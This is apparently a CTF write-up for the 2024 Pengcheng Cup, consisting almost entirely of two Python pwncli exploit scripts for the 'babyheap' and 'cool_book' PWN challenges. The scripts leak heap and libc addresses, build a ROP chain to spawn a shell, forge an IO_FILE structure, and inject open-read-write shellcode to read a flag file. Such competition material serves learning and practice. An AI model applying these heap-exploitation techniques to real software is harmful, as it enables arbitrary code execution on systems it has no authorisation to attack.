鹏城杯2024

PWN

babyheap-pcb2024

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from struct import *

cli_script() # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io  = gift["io"] # io对象,pwn.process或者pwn.remote
elf  = gift["elf"] # ELF对象,ELF("./pwn")
libc = gift.libc # ELF对象, ELF("./libc.so.6")
filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug



arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    #libc = ELF("./libc.so.6")
    #gift['libc'] = libc
    # 有时候远程提供的libc与本地不一样,打靶机时替换libc为远程libc
    pass
libc_box = LibcBox() # LibcBox对象

r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(1)
# - - - - - - - - - - - - - #
onegadget = [0xebc81,0xebc85 ,0xebc88,0xebce2 ,0xebd38,0xebd3f,0xebd43]
# - - - - - - - - - - - - - #
def cmd(c):
    sla("inputs your choice:",str(c))
def add(idx,size,data=b'AAAA'):
    cmd(1)
    sla("input idx:",str(idx))
    sla("input size:",str(size))
    sa("input content:",data)
def free(idx):
    cmd(2)
    sla("input idx:",str(idx))
def show(idx):
    cmd(3)
    sla("input idx:",str(idx))
def edit(idx,data):
    cmd(4)
    sla("input idx:",str(idx))
    s(data)
# - - - - - - - - - - - - - #
def pwn_exp():
    for i in range(9):
        add(i,0x400)
    for i in range(7):
        free(i)
    free(7)
    add(9,0x40,b'A'*0x11)
    show(9)
    ru(b'A'*0x10)
    heap_base = u64_ex(io.recv(6))-0x41
    add(10,0x40,b'A'*0x8)
    show(10)
    ru(b'A'*0x8)
    libc.address = u64_ex(io.recv(6)) - 0x000078c237c1ace0 + 0x78c237a00000
    CG.set_find_area(find_in_elf=False,find_in_libc=True)
    p = p64_ex(CG.pop_rdi_ret())+p64_ex(CG.bin_sh())+p64_ex(libc.sym.system)
    add(11,0x400,p)
    fake_addr = libc.sym._IO_2_1_stderr_
    pay = b''
    io_ = IO_FILE_plus_struct()
    io_.flags = 0
    io_.vtable = libc.sym._IO_wfile_jumps
    io_._IO_write_base = fake_addr
    io_._IO_write_ptr = fake_addr + 1
    io_._wide_data = fake_addr-0x30
    io_.chain = libc.sym.setcontext+61
    
    bbb = bytes(io_)
    pay += bbb[:112]+p64_ex(heap_base-0x400)+p64_ex(CG.ret())+bbb[128:176]+p64_ex(fake_addr)+bytes(io_)[184:]
    edit(-4,pay)
    # b * _IO_wdoallocbuf+43
    cmd(1)
    sl('99')

#log
    log.info('#---#---#---#---#')
    #log.success('libc.address:'+hex(libc.address))
    log.success('elf.address:'+hex(elf.address))
    log.success('heap_bae:'+hex(heap_base))



if __name__ == '__main__':
    pwn_exp()
    io.interactive()

cool_book

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from struct import *

cli_script() # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io  = gift["io"] # io对象,pwn.process或者pwn.remote
elf  = gift["elf"] # ELF对象,ELF("./pwn")
libc = gift.libc # ELF对象, ELF("./libc.so.6")
filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug



arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    #libc = ELF("./libc.so.6")
    #gift['libc'] = libc
    # 有时候远程提供的libc与本地不一样,打靶机时替换libc为远程libc
    pass
libc_box = LibcBox() # LibcBox对象

r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(1)
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #
def cmd(c):
    sla("3.exit",str(c))
def add(idx,data=b'AAAA'):
    cmd(1)
    sla("input idx",str(idx))
    sa("input content",data)
def free(idx):
    cmd(2)
    sla("input idx",str(idx))
# - - - - - - - - - - - - - #
def pwn_exp():
    ru('addr=')
    heap_base = int(ru('\n'),16)

    rr = asm('''
xor rdi,rdi
mov rsi,{}
jmp $-61
'''.format(heap_base))
    rrr = asm('''
mov edx,esi
syscall
call rsi
''')
    orw = asm('''
mov rsp,rbp
push {}
mov rdi,rsp
xor rsi,rsi
xor rdx,rdx
mov rax,2
syscall
mov edi,3
mov rsi,rsp
mov rdx,120
mov rax,0
syscall
mov rdi,1
mov rsi,rsp
mov rdx,120
mov rax,1
syscall     
'''.format(u64_ex('flag')))
    
    for i in range(48):
        add(i)

    print(len(rrr))
    add(48,rrr)
    add(49,rr)
    cmd(3)
    pause()
    sl(orw)


#log

    log.info('#---#---#---#---#')
    #log.success('libc.address:'+hex(libc.address))
    log.success('elf.address:'+hex(elf.address))
    log.success('heap_bae:'+hex(heap_base))



if __name__ == '__main__':
    pwn_exp()
    io.interactive()